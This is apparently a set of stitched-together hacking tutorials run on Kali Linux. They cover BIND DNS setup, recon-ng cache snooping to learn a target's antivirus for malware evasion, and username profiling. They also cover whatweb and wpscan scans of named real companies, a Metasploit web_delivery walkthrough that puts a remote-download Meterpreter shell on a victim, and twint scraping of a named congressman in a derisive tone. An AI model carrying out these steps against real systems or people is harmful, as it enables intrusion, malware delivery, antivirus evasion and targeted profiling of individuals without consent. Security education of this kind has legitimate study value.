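mail    IN      A       192.168.1.40
```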
Now, we need to create a reverse lookup file. Once again, we have a template in the /etc/bind directory. In this case, it's named db.127. Let's copy it to reverse.hackers-arise.local.
kali > cp db.127 reverse.hackers-arise.local
Then, let's open that file with leafpad.
kali > leafpad /etc/bind/reverse.hackers-arise.local
Let's now make a few changes.
Under "Your Name Server" add:
primary.yourdomain.local.
and the IP address of the name server.
Under "Reverse Lookup" add:
the last octet of the IP address of the name server and primary.yourdomain.local.
Under "PTR Records" add:
the last octet of the web server and www.yourdomain.local.
the last octet of the mail server and mail.yourdomain.local.
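Putting those edits together, the reverse zone file might look like this sketch (again, the last octets 30 and 40 for the web and mail servers are placeholders for this example):

```
$TTL    604800
@       IN      SOA     primary.hackers-arise.local. root.hackers-arise.local. (
                              1         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      primary.hackers-arise.local.
27      IN      PTR     primary.hackers-arise.local.
30      IN      PTR     www.hackers-arise.local.
40      IN      PTR     mail.hackers-arise.local.
```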
4. In our final step, we just need to restart the service for our changes to take effect.
kali > service bind9 restart
For those of you who prefer the new systemd commands, this works just as well.
kali > systemctl restart bind9
Now, our BIND server is ready to resolve DNS queries on our local area network!
Summary
DNS is among the most essential communication protocols for the smooth functioning of your Internet access, translating human-readable domain names into router-readable IP addresses. There have been a number of security threats to DNS, including stealing DNS admin credentials and changing zone files, as well as Denial of Service (DoS) attacks.
Welcome back, my greenhorn hackers!
In previous tutorials, we have looked at ways to re-encode your payloads and other malware to evade AV software. We have also looked at the inner workings of Clam AV to better understand how this type of software works. Sometimes, we can encode our malware with applications such as Shellter and Veil-Evasion and it will successfully evade one type of AV software and not another.
In our efforts to evade AV, it may not be possible to evade all AV software. On the other hand, we may not need to evade ALL AV software, just the AV software that the target is using. If we could decipher what AV they are using, we could make certain that our malware is undetectable by that AV. That's all we need.
In an earlier tutorial, I introduced you to recon-ng. Recon-ng is a powerful modular reconnaissance framework. One of its modules enables us to detect what AV software the target is using. It relies upon sending non-recursive DNS queries to the corporate DNS server to determine whether that server has cached the AV manufacturer's website. If it has, that means that someone within the organization is using that AV software (someone in the organization has had to go to the website to update signatures). If it hasn't, no one has queried for that AV manufacturer's site, and the organization is likely not using that software.
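The trick behind this cache snooping can be reduced to a simple rule: send a query with the recursion-desired (RD) bit cleared, and if an answer still comes back, the record must already have been in the server's cache. Below is a minimal, illustrative Python sketch of that decision logic (recon-ng's own implementation differs):

```python
import struct

def appears_cached(response: bytes) -> bool:
    """Decide whether a raw DNS response to a NON-recursive query
    indicates a cache hit: NOERROR status plus at least one answer
    record, even though the server was not asked to recurse."""
    txid, flags, qdcount, ancount, nscount, arcount = struct.unpack(
        ">HHHHHH", response[:12])
    rcode = flags & 0x000F        # low 4 bits of flags = response code
    return rcode == 0 and ancount > 0

# Fabricated response header: standard response (QR=1), NOERROR, 1 answer
cache_hit = struct.pack(">HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
```

A positive result only tells you someone behind that resolver recently looked the name up, which is exactly the inference the recon-ng module draws.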
1. Fire Up Kali and Start Recon-Ng
Let's start by firing up Kali and starting recon-ng by typing in a terminal:
kali >recon-ng
When recon-ng starts, you will be greeted with a welcome screen like that above.
2. Show Modules
Remember, recon-ng works very similarly to Metasploit. The commands in some cases are identical and if not, very close. Like Metasploit, we can see all the modules by typing;
recon-ng > show modules
As you can see, the first group of modules displayed are the discovery modules and the first discovery module is "cache snoop". That is the module we want to use here.
3. Use
To use the cache snoop module the syntax is identical to Metasploit. Simply type;
recon-ng > use discovery/info_disclosure/cache_snoop
Once this module is loaded, type;
recon-ng >show info
In this info screen, we can see the basics of this module. It's really quite simple. It requires two inputs: (1) a file containing the AV software domains, and (2) the IP address of the NAMESERVER we are snooping on.
Recon-ng includes a default list of AV software domains. It is a simple text file at;
/usr/share/recon-ng/data/avdomains
We can view its contents by simply opening it in a text editor or using one of the many commands in Linux that displays the contents of a file such as cat, less and more. Here, I have displayed its contents using more.
As you can see, it contains the domains of many of the major AV software companies, but not all. If you want to add a domain, simply open this file in a text editor, add the domain and save the file. Voila! You are done.
4. Getting the Nameservers
To get the nameserver of the domain you are targeting, simply use the dig command in Linux. The syntax is simple: dig <domainname> ns, where ns indicates that you want the nameserver. Let's try it for www.wonderhowto.com.
kali > dig wonderhowto.com ns
As you can see in the screenshot above, this command displays the nameservers for wonderhowto.com. Let's try the same for a major information security training company, www.infosecinstitute.com.
kali > dig infosecinstitute.com ns
As you can see, we found the nameservers for www.infosecinstitute.com. Let's write down all these nameservers for use in recon-ng.
5. Set NAMESERVER and Run
Let's start by using infosecinstitute's nameserver and see whether the DNS server has any evidence of anyone in this organization using any of this AV software.
recon-ng > set NAMESERVER 216.92.3.91
recon-ng > run
As you can see, recon-ng found that products from each of these AV developers had been used by someone within that organization. It's not surprising that an information security firm would have tried all the major manufacturers' software.
Let's try the same with wonderhowto.com.
recon-ng > set NAMESERVER 208.78.70.29
recon-ng > run
We can see that the nameserver for wonderhowto.com does not have ANY entries for the AV software on our list. This doesn't mean that wonderhowto.com is not using any AV software, but simply that it is using AV software not on the list included in recon-ng. That means that malware detectable by one of the products on our list may still go undetected by the target.
Conclusion
What can we conclude from these results? Let's begin by saying that this module is not perfect, but it can be useful. In the case of www.infosecinstitute.com, we can conclude that someone has recently used or updated each of the AV products on our list. As for wonderhowto.com, we can conclude that no one within that organization using that nameserver has used or updated AV software on that list. That could make them vulnerable.
Welcome back, my aspiring cyber warriors!
The Internet is the largest data repository the world has ever known! Open Source Intelligence or OSINT is the way to gather and unlock the intelligence embedded in all that data.
In recent years, a brand new reconnaissance framework has become available to us that leverages many of the tools we are already using, but makes them far more powerful. Rather than manually searching for the data from innumerable data sets, recon-ng enables you to automate your data searches saving you time and energy.
recon-ng was developed by Tim Tomes while at Black Hills Information Security. He developed it as a Python script and modeled its usage after Metasploit, making it easy for a pentester with Metasploit skills to use recon-ng with a very short learning curve.
It is built into Kali, so there's no need to download or install anything.
Let's explore its many and powerful capabilities a bit here.
Step #1: Fire Up Kali and Open a Terminal
The first step, of course, is to fire up Kali and open a terminal like below.
Step #2: Start recon-ng
To start recon-ng, we simply need to enter the command "recon-ng" at the command line.
kali > recon-ng
When recon-ng starts, you will be greeted by its splash screen and a menu of the module types and their counts. These module types include;
1. Recon Modules
2. Reporting Modules
3. Import Modules
4. Exploitation Modules
5. Discovery Modules
Next, let's find out what commands we can use in recon-ng by entering help at the recon-ng prompt.
[recon][default] > help
If you have used Metasploit, you can see many of the same commands such as use, set, show, search, etc.
To see all the modules in recon-ng, we can simply enter "show modules".
[recon][default] > show modules
Step #3: API (Application Programming Interface) Keys
recon-ng is capable of using a number of online resources such as Facebook, Twitter, Instagram, Google, Bing, LinkedIn and others. To use these resources, you simply need to obtain an API key and enter it. For a list of API keys that recon-ng can use, enter "keys list".
[recon][default] > keys list
So, once we have obtained our Facebook API key, we simply need to add that key to use Facebook for reconnaissance.
[recon][default] > keys add facebook_api 123456
[recon][default] > keys list
Now, you are ready to use Facebook's API to connect to Facebook and do your recon searches there.
Step #4: Profiler
recon-ng has numerous modules for finding information available on the web. Let's take a look at just one module here, profiler (we'll examine others in future tutorials).
Let's assume that you are looking for a person who uses the profile name "Occupytheweb" and want to find out whether they use that same profile on other sites. recon-ng has a module for that!
It's called the 'profiler' and we can find it at recon/profiles-profiles/profiler. To use this module, simply enter;
[recon][default] > use recon/profiles-profiles/profiler
To learn more about this module, then enter;
[recon][default] > info
We can see in the screenshot above that it takes a profile name and searches for that profile name through numerous web sites for that same name.
To begin our search, we simply enter the profile we are looking for;
[recon][default] > set source occupytheweb
and then enter;
[recon][default] > run
The profiler module then searches through numerous web sites seeking matches of this profile name. In this case, it found 9 matches! It should be pointed out that these may not all be the same person, but simply the same profile name.
In my earlier tutorial on finding information on Twitter using twint, we searched the tweets of the smarmy second-term U.S. congressman from Florida, Matt Gaetz. Let's try a similar search for the sycophantic Mr. Gaetz with profiler and see whether he has other accounts under his same twitter profile, mattgaetz.
Let's set the source to "mattgaetz".
[recon][default] > set source mattgaetz
Then, enter "run".
[recon][default] >run
Within seconds, recon-ng returns numerous accounts using this same profile.
Next, of course, we can go to those accounts to find more information on the target of our recon.
When we go to account of Matt Gaetz on flickr (flickr.com/photos/mattgaetz) we see photos of Mr. Gaetz impersonating a public servant for his 0 followers.
Summary
recon-ng is an excellent tool for automating the extraction of the cornucopia of information and intelligence from the web. In this case, we used the profiler module to look for the use of the same profile in numerous websites. This can be an effective way to find accounts where the target may reveal additional information about themselves that can be useful in social engineering attacks and forensic investigations.
For more on recon-ng, check out the tutorial on determining the anti-virus of the target using recon-ng here.
Welcome back, my aspiring cyber warriors!
Web sites are built using a variety of technologies (see Web Technologies here). In most cases, before we develop a hacking strategy for a web site, we need to understand the technologies employed in building it. Web site attacks are not generic: attacks against WordPress-based web sites won't work against .NET-based websites, for instance. We need to do this type of reconnaissance before progressing to compromise.
In previous tutorials in this Web App Hacking series, we have used OWASP-ZAP and wpscan for vulnerability scanning. wpscan and some other specialized vulnerability scanners require that we first identify the target's technologies or CMS. In this article, we will use the tool whatweb to identify what technologies the web site developers employed in building the site.
Whatweb is a Ruby script that probes the website for signatures of the server, the CMS and other technologies used to develop the site. According to its web page:
WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
Once we know what technologies the web site is running, we can run vulnerability scans to find known vulnerabilities and develop an attack strategy.
Step #1: Fire Up Kali
The first step, of course, is to fire up Kali and open a terminal. Whatweb is built into Kali, so no need to download and install anything.
Step #2: Start Whatweb's Help
To start, let's take a look at whatweb's help screen.
kali > whatweb -h
Whatweb displays several pages of help. We can see in this first screen that the basic syntax to use whatweb is;
whatweb [options] <URL>
You will also notice in this first section a paragraph titled "Aggression". Here we can select how stealthy we want to be in probing the site. The more aggressive the scan, the more accurate it is and the more likely your scan will be detected.
When we scroll to the bottom of the help screen, we can see some examples. In most cases, we can simply enter the command, whatweb, followed by the URL of the target site.
Step #3: Scan Web Sites
Let's try scanning some web sites of companies that provide information security (infosec) training. Let's find out if they are actually securing their sites as they teach in their courses.
Let's begin by scanning sans.org.
kali > whatweb sans.org
When we scan sans.org, we can see that they have hidden their country, use Apache as their web server and an Incapsula Web Application Firewall (WAF). Minimal information, so they have done well.
Next, let's try the same scan on another infosec training site, www.infosecinstitute.com.
kali > whatweb infosecinstitute.com
When we scan www.infosecinstitute.com, we find a bit more information such as their country (United States), their web server (nginx) and their CMS (WordPress).
Next, let's scan the infosec training site cybrary.it.
kali > whatweb cybrary.it
As we can see, cybrary.it's server is in the U.S.; they are using Amazon Web Services (AWS), Amazon's content delivery network CloudFront, and the WordPress CMS.
Step #4: Vulnerability Scan
Now that we have determined the technologies used in these sites, we can look for known vulnerabilities. The last two sites, infosecinstitute.com and cybrary.it, both use the WordPress CMS. As a result, we can use the best vulnerability scanner for WordPress sites, wpscan (for more on how to use wpscan, click here).
Let's test infosecinstitute.com for vulnerabilities first.
kali > wpscan --url https://www.infosecinstitute.com
As we can see above, wpscan detected the server, the backend and the plugins for this WordPress website, but did not identify any known vulnerabilities. Great job Infosecinstitute!
You practice what you preach/teach on web security!
Next, let's try the same scan on Cybrary.it
kali > wpscan --url https://www.cybrary.it --stealthy
Note that I used the stealthy switch in this command as cybrary.it has a WAF (Web Application Firewall) that blocks these scans. Without using the stealthy switch, the WAF will block our scan and tell us that the site doesn't use WordPress.
As you can see in the screenshot above, www.cybrary.it has 27 known vulnerabilities in its WordPress based web site!
When wpscan tested their WordPress plugins, it identified another 17 vulnerabilities! Overall, the CybraryIT website had 42 known vulnerabilities on its site. That is nothing less than professional negligence!
How can anyone take seriously an information security training company who doesn't even know how to secure their own web site?
I have to wonder why they haven't been hacked yet? Or maybe they have and don't know it?
Summary
Before developing a hacking strategy for a website, we need to do some reconnaissance. Some of the key information we are looking for includes;
1. the country and hosting provider,
2. the CMS,
3. the web server,
4. the languages used,
5. any email addresses
Whatweb can provide most of this information for most web sites. Only after determining the technologies employed can we begin to develop a strategy for compromising the site. In some cases, we can then scan the identified technologies for known vulnerabilities. In the case above, we determined that two of the websites used WordPress as their CMS, and by using the excellent vulnerability scanner wpscan, we found one web site that practiced what they preached in web site security (infosecinstitute.com) and another that did not (Cybrary).
The developers responsible for the Cybrary website and the management that hired them should all be held responsible for professional negligence for not patching 42 known vulnerabilities.
Welcome back, my aspiring cyber warriors!
Metasploit, one of my favorite hacking/pentesting tools, has so many capabilities that even after my many tutorials on it, I have only scratched the surface. For instance, it can be used with Nexpose for vulnerability scanning, with nmap for port scanning, and, with its numerous auxiliary modules, for nearly unlimited other hacking-related tasks.
Among the exploit modules, a category that we have not addressed are the web delivery exploits. These exploits enable us to open a web server on the attack system and then generate a simple script command that, when executed on the victim system, will open a Meterpreter shell on the target. This web delivery exploit can use Python, PHP, or the Windows PowerShell scripts.
Of course, it is your job to get the script onto the target machine. This means that you will likely need physical access to the system, or to wrap the code in a seemingly innocuous object that the victim will be enticed to execute.
In this tutorial, we will exploit a Linux or Mac system. Since both are UNIX-like systems, they both have built-in Python interpreters by default. If we can get the script command generated by this exploit on the target, we can have complete control of the system including keystroke logging, turning on the webcam, recording from the microphone, and reading or deleting any files on the system.
Let's get started.
Step 1: Open a Terminal
The first step, of course, is to fire up Kali and open a terminal.
Step 2: Start Metasploit & Load the Exploit
Next, start Metasploit by typing:
kali > msfconsole
This should open the msfconsole like that below.
Then we need to load the exploit:
msf > use exploit/multi/script/web_delivery
Set the IP of our attack system:
msf > set LHOST 192.168.181.153
And set the port we want to use:
msf > set LPORT 4444
Of course, I am using my private IP address in my lab, but if the target is outside your LAN, you will likely need to use your public IP and then port forward.
Step 3: Show Options
Now that we have the exploit loaded and ready to go, let's take a look at the options for this exploit. Type:
msf > show options
It looks like we have all the options set as we need. Now, let's get a bit more information on this exploit before we proceed. Type:
msf > info
As you can read above, this exploit starts a web server on our attack system and, when the generated command is executed on the target system, a payload is downloaded to the victim. In addition, this attack does not write to disk, so it should not trigger the antivirus software on the victim's system.
Step 4: Start the Exploit
Our next step is to run the exploit. This starts the web server on our attack system and also generates a Python command that we can use to connect to this web server. Before we do that, though, we need to set the target to 0, selecting the Python exploit.
msf > set target 0
Now, we can type exploit:
msf > exploit
Notice the last thing this exploit writes is "Run the following command on the target machine" followed by the command we need to use. Copy this command.
Step 5: Run the Command on the Victim System
Next, take that command to the victim machine. In this case, I'm using an Ubuntu 14.04 system. You will need to precede the command with sudo as it requires root privileges.
Then hit Enter. When you return to your Kali system, you can see a meterpreter has been started on the target system! We own that box!
Initially, the Meterpreter is running in the background. To bring it to the foreground, we can type:
msf > sessions -l
This then brings the Meterpreter session to the foreground and we get the meterpreter prompt!
To control the system, we can run the Meterpreter commands or scripts, although most of the scripts are written for Windows systems.
The Internet is the largest treasure trove of data in the history of humankind! This repository of data is so large that companies and scientists are straining to understand and manage its scale.
We can mine that data with many different tools and sources. When that data is combined with data from multiple sources, a clear and valuable data set and insight can be garnered. This data can prove very useful in a forensic investigation or in reconnaissance of a target.
One source of an immense amount of data is the social networking site Twitter. Millions of people send out tweets daily including politicians, business people, celebrities and the U.S. President. Significant information and insights can be harvested from these tweets.
Recently, a new open source tool named twint was developed to scrape information from this platform anonymously. It is capable of scraping data from Twitter without using the Twitter API or even having an account with Twitter.
Let's take a look at how this tool works.
Step #1 Download and Install
The first step is to download this tool from github.com and its dependencies.
kali > git clone https://github.com/twintproject/twint.git
Once we have the code, we need to download its requirements.
kali > cd twint
kali > pip3 install -r requirements.txt
Now that we have installed twint in our system, let's take a look at its syntax.
Twint's syntax is rather simple.
twint -u <username> <options>
Options include;
--following
--followers
--favorites
-s <search string>
--year <limit search to a particular year>
-o <output> <file.txt or file.csv>
--database <sqlite database name>
Step #2 Gathering Info on a target
Let's try using this tool to gather some intelligence on the smarmy, second term congressman from Florida, Matt Gaetz. Gaetz is known for, among other things, his support for Holocaust deniers, white nationalism and being a Trump sycophant.
If we wanted to scrape all of the Twitter accounts Matt Gaetz is following and output them to a file name "gaetzfollowing" in a csv format, we could enter;
kali > twint -u mattgaetz --following -o gaetzfollowing --csv
As you can see, this tool outputs every account Matt Gaetz is following to the screen and into a .csv file gaetzfollowing.
We could also harvest his followers by entering;
kali > twint -u mattgaetz --followers -o gaetzfollowers --csv
If we want to see if the word "trump" appeared in Matt Gaetz's tweets, we could use the -s switch with the word trump.
kali > twint -u mattgaetz -s trump
Now we can see all of Rep. Gaetz's tweets regarding Trump, including;
"I love @realdonaltrump "
on April 4, 2019.
We now have every tweet from Mr. Gaetz where he mentions "trump".
If we scroll down a bit, we can see that Mr. Gaetz didn't always love trump. On April 17, 2011 he tweets;
@realdonaldtrump is running for Pres??? Now I know how #Democrats feel every time @alsharpton runs #isthisreal
Apparently, Mr. Gaetz was equating Donald Trump and Rev. Al Sharpton in 2011. I don't think this was meant as a flattering comparison.
By the time you read this, Mr. Gaetz will likely have deleted that old Twitter post, but we will have preserved it for all posterity.
Step #3: Scrape the Tweets and save to a Database
Often, we will want to harvest these tweets and then preserve and search them in a database. Database searches can be more effective and faster, and have the capability of linking to other databases and tables for cross-referencing.
Let's scrape all of Matt Gaetz's tweets and put them in a database named mattgaetzDB.
kali > twint -u mattgaetz --database mattgaetzDB
As you can see, twint will now grab every tweet from our friend, Matt Gaetz.
Now that we have all the tweets from Mr. Gaetz, we can open them with the SQLite database browser built into Kali. Simply go to File--> Open and select the mattgaetzDB file.
It should look like this.
We can see that there are 8 tables in our database.
Let's focus on his tweets rather than the other information. When we expand the "tweets" table, we can see all the fields in this table.
Let's now move to the tab to the far right (how appropriate) labelled "Execute SQL".
Here we can create SQL queries to search this data. Let's search for every tweet where Mr. Gaetz mentions his friend "trump".
To construct this query, we can enter;
SELECT tweet
FROM tweets
WHERE tweet LIKE '%trump%';
When we execute this query by clicking the blue |>, we can see the results in the lower window.
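If you'd rather drive the same search from code, Python's built-in sqlite3 module can run the identical query against the twint database. The snippet below builds a tiny in-memory stand-in for the tweets table (the real twint schema has many more columns; the sample rows here are illustrative) just to demonstrate the LIKE pattern:

```python
import sqlite3

# In-memory stand-in for mattgaetzDB; only the column we query is modeled.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE tweets (id INTEGER PRIMARY KEY, tweet TEXT)")
con.executemany(
    "INSERT INTO tweets (tweet) VALUES (?)",
    [("I love @realdonaldtrump",),
     ("Town hall in Pensacola tonight",),
     ("@realdonaldtrump is running for Pres???",)])

# Same query as above; SQLite's LIKE is case-insensitive for ASCII,
# so '%trump%' would match 'Trump' as well.
rows = con.execute(
    "SELECT tweet FROM tweets WHERE tweet LIKE '%trump%'").fetchall()
```

To run it against the real database, you would connect to the mattgaetzDB file instead of ":memory:" and skip the table creation.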
Summary
Twitter, in particular, and open source intelligence, in general, can be an incredible source for harvesting all the data available to us on the web. Twint, in combination with SQLite, is a great tool for harvesting and analyzing data available to us through Twitter anonymously and without ever opening a Twitter account.
